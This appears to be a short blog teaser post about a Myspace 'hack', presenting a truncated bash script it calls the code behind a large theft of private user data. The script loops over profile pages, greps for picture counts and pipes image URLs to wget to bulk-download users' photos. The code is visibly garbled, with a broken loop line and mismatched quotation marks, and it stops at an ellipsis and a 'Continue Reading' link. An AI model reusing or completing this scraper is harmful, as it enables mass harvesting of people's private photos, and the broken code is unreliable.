Myspace Hack and Identity Theft

This may seem like random lines to a lot of you, but it is the code to the largest theft of private user data to date.

#! /bin/bash
a=$1
LIMIT=$2
dir=$3
for ((; a view$LIMIT
if [ `grep -o 'Pictures: [0-9]*’ view$LIMIT | awk ‘{ print $2 }’` -ne 0 ]
then
grep -o ‘http://[a-z0-9A-Z/._-]*.jpg’ view$LIMIT | wget -q -i - -P [...]

Continue Reading...

No Comments